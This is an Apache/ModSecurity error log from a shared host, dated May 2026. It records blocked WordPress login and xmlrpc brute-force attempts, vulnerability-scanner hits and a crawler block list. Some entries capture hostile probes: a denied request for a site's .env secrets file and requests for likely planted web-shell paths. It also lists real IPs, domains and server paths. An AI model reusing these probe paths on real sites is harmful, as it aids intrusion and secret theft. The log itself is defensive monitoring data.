[Tue May 26 18:55:26.879602 2026] [security2:error] [pid 1036960:tid 1037023] [remote 49.12.3.147:45886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahWfRoGNKXNii6nttH9ovgAAwT4"]
[Tue May 26 18:55:27.103967 2026] [security2:error] [pid 1036960:tid 1037022] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfRoGNKXNii6nttH9oxwAA0D0"]
[Tue May 26 18:55:27.104296 2026] [security2:error] [pid 1036960:tid 1037165] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfRoGNKXNii6nttH9oxwAA0D0"]
[Tue May 26 18:55:28.404546 2026] [security2:error] [pid 1036960:tid 1037181] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfR4GNKXNii6nttH9o6AAAAOA"]
[Tue May 26 18:55:31.470357 2026] [security2:error] [pid 1036960:tid 1037140] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfS4GNKXNii6nttH9pPgAAALc"]
[Tue May 26 18:55:33.219607 2026] [security2:error] [pid 1036960:tid 1037205] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfTIGNKXNii6nttH9pbAAAAPg"]
[Tue May 26 18:55:33.446596 2026] [security2:error] [pid 1036960:tid 1037026] [remote 72.167.150.128:37932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfTYGNKXNii6nttH9pcwAAwUE"]
[Tue May 26 18:55:33.521654 2026] [security2:error] [pid 1036960:tid 1037168] [client 31.44.184.89:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfTYGNKXNii6nttH9pcgAAANM"]
[Tue May 26 18:55:35.395125 2026] [security2:error] [pid 1036960:tid 1037204] [client 172.225.180.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWfT4GNKXNii6nttH9psgAAAPc"]
[Tue May 26 18:55:35.983817 2026] [security2:error] [pid 1036960:tid 1037180] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfT4GNKXNii6nttH9pzAAAAN8"]
[Tue May 26 18:55:36.321359 2026] [security2:error] [pid 1036960:tid 1037208] [client 103.48.2.66:55793] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 66.2.48.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rmbtsbd.com"] [uri "/xmlrpc.php"] [unique_id "ahWfUIGNKXNii6nttH9p1wAAAPs"]
[Tue May 26 18:55:36.321472 2026] [security2:error] [pid 1036960:tid 1037208] [client 103.48.2.66:55793] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "rmbtsbd.com"] [uri "/xmlrpc.php"] [unique_id "ahWfUIGNKXNii6nttH9p1wAAAPs"]
[Tue May 26 18:55:37.537143 2026] [security2:error] [pid 1036960:tid 1037073] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfUYGNKXNii6nttH9p9QAA9XA"]
[Tue May 26 18:55:37.537333 2026] [security2:error] [pid 1036960:tid 1037202] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfUYGNKXNii6nttH9p9QAA9XA"]
[Tue May 26 18:55:38.173078 2026] [security2:error] [pid 1036960:tid 1037173] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfUYGNKXNii6nttH9p_wAAANg"]
[Tue May 26 18:55:39.168747 2026] [security2:error] [pid 1036960:tid 1037131] [client 103.48.2.66:65236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 66.2.48.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rmbtsbd.com"] [uri "/xmlrpc.php"] [unique_id "ahWfU4GNKXNii6nttH9qJgAAAK4"]
[Tue May 26 18:55:39.168847 2026] [security2:error] [pid 1036960:tid 1037131] [client 103.48.2.66:65236] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "rmbtsbd.com"] [uri "/xmlrpc.php"] [unique_id "ahWfU4GNKXNii6nttH9qJgAAAK4"]
[Tue May 26 18:55:39.535412 2026] [security2:error] [pid 1036960:tid 1037195] [client 62.244.225.226:47785] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWfU4GNKXNii6nttH9qKgAAAO4"]
[Tue May 26 18:55:40.581065 2026] [security2:error] [pid 1036960:tid 1037213] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfVIGNKXNii6nttH9qSQAAAQA"]
[Tue May 26 18:55:42.395751 2026] [security2:error] [pid 1036960:tid 1037125] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfVYGNKXNii6nttH9qgAAAAKg"]
[Tue May 26 18:55:43.933148 2026] [security2:error] [pid 1036960:tid 1037198] [client 114.119.152.231:54221] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/author/techdc/page/8/"] [unique_id "ahWfV4GNKXNii6nttH9qtwAAAPE"], referer: https://preetishah.com/author/techdc/page/7/
[Tue May 26 18:55:43.974915 2026] [security2:error] [pid 1036960:tid 1036990] [remote 91.134.89.60:51980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWfV4GNKXNii6nttH9qrgAAuR0"]
[Tue May 26 18:55:44.134965 2026] [security2:error] [pid 1036960:tid 1036979] [remote 78.142.18.172:52628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWfV4GNKXNii6nttH9qtgAA_RI"]
[Tue May 26 18:55:44.482130 2026] [security2:error] [pid 1036960:tid 1036966] [remote 18.209.220.99:10886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfWIGNKXNii6nttH9qxQAAvAU"]
[Tue May 26 18:55:44.651116 2026] [security2:error] [pid 1036960:tid 1036972] [remote 103.95.119.103:32860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfWIGNKXNii6nttH9qxwAAhQs"]
[Tue May 26 18:55:44.836206 2026] [security2:error] [pid 1036960:tid 1036982] [remote 18.209.220.99:10886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfWIGNKXNii6nttH9qywAAqxU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:55:45.129849 2026] [security2:error] [pid 1036960:tid 1037119] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfWIGNKXNii6nttH9qzgAAAKI"]
[Tue May 26 18:55:45.712975 2026] [security2:error] [pid 1036960:tid 1036968] [remote 78.142.18.172:52628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWfWYGNKXNii6nttH9q6gAAswc"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:55:47.437223 2026] [security2:error] [pid 1036960:tid 1037213] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfW4GNKXNii6nttH9rBwAAAQA"]
[Tue May 26 18:55:47.711220 2026] [security2:error] [pid 1036960:tid 1037085] [remote 103.95.119.103:32862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfW4GNKXNii6nttH9rHwAA6Hw"]
[Tue May 26 18:55:48.216575 2026] [security2:error] [pid 1036960:tid 1036991] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfXIGNKXNii6nttH9rKwAAwB4"]
[Tue May 26 18:55:48.216738 2026] [security2:error] [pid 1036960:tid 1037149] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfXIGNKXNii6nttH9rKwAAwB4"]
[Tue May 26 18:55:49.381350 2026] [security2:error] [pid 1036960:tid 1036994] [remote 72.167.150.128:42704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfXYGNKXNii6nttH9rSAAAxSE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:55:49.609042 2026] [security2:error] [pid 1036960:tid 1037099] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfXYGNKXNii6nttH9rRAAAAI4"]
[Tue May 26 18:55:51.207896 2026] [security2:error] [pid 1036960:tid 1037140] [client 180.102.110.170:34626] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bramas.in"] [uri "/"] [unique_id "ahWfX4GNKXNii6nttH9regAAALc"]
[Tue May 26 18:55:51.208003 2026] [security2:error] [pid 1036960:tid 1037140] [client 180.102.110.170:34626] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "bramas.in"] [uri "/"] [unique_id "ahWfX4GNKXNii6nttH9regAAALc"]
[Tue May 26 18:55:51.978888 2026] [security2:error] [pid 1036960:tid 1037123] [client 47.128.99.26:39124] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/robots.txt"] [unique_id "ahWfX4GNKXNii6nttH9rnAAAAKY"]
[Tue May 26 18:55:52.145349 2026] [security2:error] [pid 1036960:tid 1037210] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfX4GNKXNii6nttH9rkwAAAP0"]
[Tue May 26 18:55:52.827760 2026] [security2:error] [pid 1036960:tid 1037180] [client 192.71.2.9:42851] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.2.71.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWfYIGNKXNii6nttH9rrAAAAN8"]
[Tue May 26 18:55:54.226438 2026] [security2:error] [pid 1036960:tid 1037143] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfYYGNKXNii6nttH9r3gAAALo"]
[Tue May 26 18:55:54.847422 2026] [security2:error] [pid 1036960:tid 1037157] [client 14.165.131.105:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfYoGNKXNii6nttH9r_AAAAMg"]
[Tue May 26 18:55:56.128619 2026] [security2:error] [pid 1036960:tid 1037187] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfY4GNKXNii6nttH9sIQAAAOY"]
[Tue May 26 18:55:58.994885 2026] [security2:error] [pid 1036960:tid 1037200] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfZoGNKXNii6nttH9sWAAAAPM"]
[Tue May 26 18:55:59.109018 2026] [autoindex:error] [pid 1036960:tid 1037133] [client 31.220.81.161:65007] AH01276: Cannot serve directory /home1/freshrlj/mahehealthcare.com/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 18:55:59.200657 2026] [security2:error] [pid 1036960:tid 1037048] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfZoGNKXNii6nttH9sYgAAolc"]
[Tue May 26 18:55:59.200850 2026] [security2:error] [pid 1036960:tid 1037119] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfZoGNKXNii6nttH9sYgAAolc"]
[Tue May 26 18:55:59.624997 2026] [security2:error] [pid 1036960:tid 1037183] [client 159.69.14.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWfZ4GNKXNii6nttH9sdQAAAOI"]
[Tue May 26 18:55:59.848229 2026] [security2:error] [pid 1036960:tid 1037052] [remote 91.134.89.60:45854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWfZ4GNKXNii6nttH9seQAA0Fs"]
[Tue May 26 18:56:00.721135 2026] [security2:error] [pid 1036960:tid 1037035] [remote 85.215.36.85:47888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.36.215.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWfaIGNKXNii6nttH9shAAAoUo"]
[Tue May 26 18:56:00.773947 2026] [security2:error] [pid 1036960:tid 1037131] [client 159.69.14.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWfaIGNKXNii6nttH9sigAAAK4"]
[Tue May 26 18:56:01.232162 2026] [security2:error] [pid 1036960:tid 1037117] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfaIGNKXNii6nttH9sjwAAAKA"]
[Tue May 26 18:56:03.494687 2026] [security2:error] [pid 1036960:tid 1037109] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfa4GNKXNii6nttH9s2AAAAJg"]
[Tue May 26 18:56:05.665695 2026] [security2:error] [pid 1036960:tid 1037095] [client 66.249.89.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.mosykay.com"] [uri "/index.php"] [unique_id "ahWfbYGNKXNii6nttH9tEgAAAIo"]
[Tue May 26 18:56:05.832106 2026] [security2:error] [pid 1036960:tid 1037127] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfbYGNKXNii6nttH9tFQAAAKo"]
[Tue May 26 18:56:06.251561 2026] [security2:error] [pid 1036960:tid 1037157] [client 66.249.89.104:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfbYGNKXNii6nttH9tIQAAAMg"]
[Tue May 26 18:56:08.587422 2026] [authz_core:error] [pid 1036960:tid 1037123] [client 176.65.139.235:60394] AH01630: client denied by server configuration: /home2/azurm42s/public_html/ipji-app.azurmediatec.com/.env
[Tue May 26 18:56:08.628117 2026] [security2:error] [pid 1036960:tid 1037210] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfcIGNKXNii6nttH9tWgAAAP0"]
[Tue May 26 18:56:09.265229 2026] [security2:error] [pid 1036960:tid 1037191] [client 20.206.67.134:2336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWfcYGNKXNii6nttH9tcgAAAOo"], referer: www.google.com
[Tue May 26 18:56:09.338281 2026] [security2:error] [pid 1036960:tid 1037049] [remote 72.167.150.128:32956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfcYGNKXNii6nttH9tbgAAmVg"]
[Tue May 26 18:56:09.490962 2026] [security2:error] [pid 1036960:tid 1037101] [client 20.206.67.134:2337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-plain.php"] [unique_id "ahWfcYGNKXNii6nttH9tdwAAAJA"], referer: www.google.com
[Tue May 26 18:56:09.637732 2026] [security2:error] [pid 1036960:tid 1037080] [remote 72.167.150.128:32956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfcYGNKXNii6nttH9tegAAl3c"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:56:09.721046 2026] [security2:error] [pid 1036960:tid 1037082] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfcYGNKXNii6nttH9tewAAsHk"]
[Tue May 26 18:56:09.721233 2026] [security2:error] [pid 1036960:tid 1037133] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfcYGNKXNii6nttH9tewAAsHk"]
